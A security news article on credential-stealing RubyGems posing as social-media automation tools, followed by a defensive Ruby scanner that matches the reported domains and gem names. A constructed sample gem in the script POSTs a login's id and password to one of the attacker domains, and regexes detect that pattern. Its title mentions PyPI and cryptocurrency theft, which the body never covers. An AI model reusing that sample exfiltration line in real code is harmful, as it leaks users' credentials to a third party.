RubyGems and PyPI Targeted by Malicious Packages: Credential and Cryptocurrency Theft Prompting Urgent Security Updates
A recent investigation has uncovered a set of 60 malicious packages targeting the RubyGems ecosystem. The packages masquerade as harmless automation tools for social media, blogging, and messaging services while quietly harvesting user credentials. According to the software supply chain security company Socket, the campaign has been active since at least March 2023. Collectively, the gems have been downloaded more than 275,000 times, although that figure is not a count of compromised systems: not every download leads to execution, and one machine may account for several downloads.
The threat actor, operating under aliases including Zon, Nowon, Kwonsoonje, and Soonje, published gems that advertise features such as bulk posting and engagement. Those features are real, but each gem also carries hidden code that exfiltrates the usernames and passwords entered into it to a server controlled by the attacker. Some gems, including Njongto_Duo and Jongmogtolon, target financial discussion platforms: they are sold as tools for flooding investment forums with ticker mentions and stock narratives to manipulate sentiment. The servers that receive the stolen credentials include Programzon.com, Appspace.kr, and Marketingduo.co.kr, domains associated with bulk messaging and automated social media products.
The likely victims are grey-hat marketers who use such tools for spam and search engine optimisation (SEO) campaigns. Each gem functions as a Windows-targeting infostealer aimed primarily at South Korean users, as indicated by the Korean-language user interfaces and the exfiltration to .kr domains. Because the gems genuinely do what they advertise, neither functionality testing nor download popularity exposes them; the credential theft is embedded inside otherwise working tools, which is what makes the operation mature and persistent.
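A practical follow-up to a report like this is to sweep the gems already unpacked on a build host for the indicators it names. The Ruby script below is an added example written for this page; it is not Socket's tooling and it does not reproduce the malicious gems. It takes the three exfiltration domains and two gem names from the report above as indicators, flags any gem directory whose name matches, and flags any Ruby source file that references a listed domain, escalating the finding when the same file also performs an HTTP POST that carries user and password fields close together (the shape the credential leak takes in source). The sample gems it writes into a temporary directory are constructed for the demonstration; the regexes and the decision to require a domain hit before reporting are design choices of this example, not something the report specifies.

```ruby
require 'tmpdir'
require 'fileutils'

# Indicators taken from the report summarised above: the three exfiltration
# domains and two of the named gems. The scanner and the sample gems below are
# constructed for this example; none of it is Socket's tooling or the actual
# malicious code.
EXFIL_DOMAINS = %w[programzon.com appspace.kr marketingduo.co.kr].freeze
KNOWN_BAD_GEMS = %w[njongto_duo jongmogtolon].freeze

# An HTTP POST plus a user/login field followed closely by a password field is
# the shape a credential leak takes in source. Alone that is too noisy (every
# login library looks like this), so it is only reported when a listed domain
# appears in the same file.
POST_PATTERN  = /Net::HTTP\.post(_form)?\b|\.post\(/
CREDS_PATTERN = /\b(user(name)?|login|id)\b.{0,60}\b(pass(word|wd)?|pw)\b/im

Finding = Struct.new(:gem_dir, :file, :reason)

# `gem unpack` names directories "<name>-<version>"; strip the version and
# normalise case so Njongto_Duo-1.0.0 compares as njongto_duo.
def gem_name_from_dir(dir)
  File.basename(dir).sub(/-\d+(\.\d+)*\z/, '').downcase
end

# Scan a tree of unpacked gems (one subdirectory per gem) and return Findings
# in directory order so the output is stable.
def scan_gems(root)
  findings = []
  Dir.children(root).sort.each do |entry|
    gem_dir = File.join(root, entry)
    next unless File.directory?(gem_dir)
    if KNOWN_BAD_GEMS.include?(gem_name_from_dir(entry))
      findings << Finding.new(entry, nil, 'name matches a gem named in the report')
    end
    Dir.glob(File.join(gem_dir, '**', '*.rb')).sort.each do |file|
      # scrub so Korean UI strings in an unexpected encoding cannot abort the scan
      src = File.read(file, encoding: 'UTF-8').scrub
      hit = EXFIL_DOMAINS.select { |d| src.downcase.include?(d) }
      next if hit.empty?
      reason = if src.match?(POST_PATTERN) && src.match?(CREDS_PATTERN)
                 "POSTs user/password fields to #{hit.join(', ')}"
               else
                 "references exfiltration domain #{hit.join(', ')}"
               end
      findings << Finding.new(entry, file.delete_prefix("#{gem_dir}/"), reason)
    end
  end
  findings
end

# Constructed sample tree: a gem modelled on the reported behaviour (a forum
# "login" that also posts the credentials to a listed domain), a gem that only
# mentions a listed domain in a comment, and a clean gem.
def write_sample_gems(root)
  samples = {
    'njongto_duo-1.0.0/lib/njongto_duo.rb' => <<~RUBY,
      require 'net/http'
      module NjongtoDuo
        def self.login(id, pw)
          # constructed: looks like a forum login, also leaks the credentials
          Net::HTTP.post_form(URI('http://programzon.com/log'), 'id' => id, 'pw' => pw)
        end
      end
    RUBY
    'blog_helper-0.3.1/lib/blog_helper.rb' => <<~RUBY,
      # constructed: only mentions appspace.kr in a comment, performs no POST
      module BlogHelper; def self.post_article(t); t; end; end
    RUBY
    'clean_tool-2.0.0/lib/clean_tool.rb' => <<~RUBY,
      module CleanTool; def self.run; :ok; end; end
    RUBY
  }
  samples.each do |rel, src|
    path = File.join(root, rel)
    FileUtils.mkdir_p(File.dirname(path))
    File.write(path, src)
  end
end

# Build the sample tree in a temporary directory, scan it, and return the
# findings (the block value is what Dir.mktmpdir returns).
def demo
  Dir.mktmpdir('gem-scan') do |root|
    write_sample_gems(root)
    scan_gems(root)
  end
end

if __FILE__ == $PROGRAM_NAME
  demo.each { |f| puts [f.gem_dir, f.file || '-', f.reason].join("\t") }
end
```

To use it on a real host, point `scan_gems` at the `gems/` directory under `gem environment gemdir` instead of the temporary tree. Treat a clean result as the absence of these particular indicators only: a stealer that builds its domain string at runtime, reads it from a config file, or ships compiled extensions will not match a plain string search, so this is a triage step, not a substitute for reviewing what a gem actually does with the credentials it asks for.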
Categories: Malicious Software, Credential Theft, Social Media Automation Tools
Tags: Malicious Packages, RubyGems, Credential Theft, Automation Tools, Social Media, Exfiltration, Grey-Hat Marketers, Infostealer, Typosquatting, Cryptocurrency